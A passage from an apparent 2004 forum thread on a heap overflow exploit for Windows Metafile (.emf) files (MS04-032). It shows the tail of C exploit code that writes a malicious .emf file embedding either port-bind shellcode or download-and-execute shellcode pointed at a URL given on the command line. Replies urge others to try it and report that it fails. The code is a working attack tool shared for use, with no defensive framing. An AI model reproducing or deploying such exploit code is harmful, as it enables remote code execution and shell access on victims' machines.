      memcpy(portbind_sc+266, &port, 2);
      fwrite(portbind_sc, 1, sizeof(portbind_sc)-1, fp);
      fwrite(endoffile, 1, 4, fp);
   }
   else {
      printf("Download & exec, url = %s\n", argv[3]);
      fwrite(download_sc, 1, sizeof(download_sc)-1, fp);
      fwrite(argv[3], 1, strlen(argv[3]), fp);
      fwrite(&endofurl, 1, 1, fp);
      fwrite(endoffile, 1, 4, fp);
   }
 
   printf("[+] Ok\n");
   fclose(fp);
 
   return 0;
}


Try it now.
Regards.
Man-In-the-Middle
Re: Microsoft Windows Metafile (.emf) Heap Overflow Exploit (MS04-032)
« Reply #6 on: 26 October 2004, 01:46 »

Same, it doesn't work; well, I tested it, and nothhhing happens, it just pops the screen at me

regards

Man-In-the-Middle
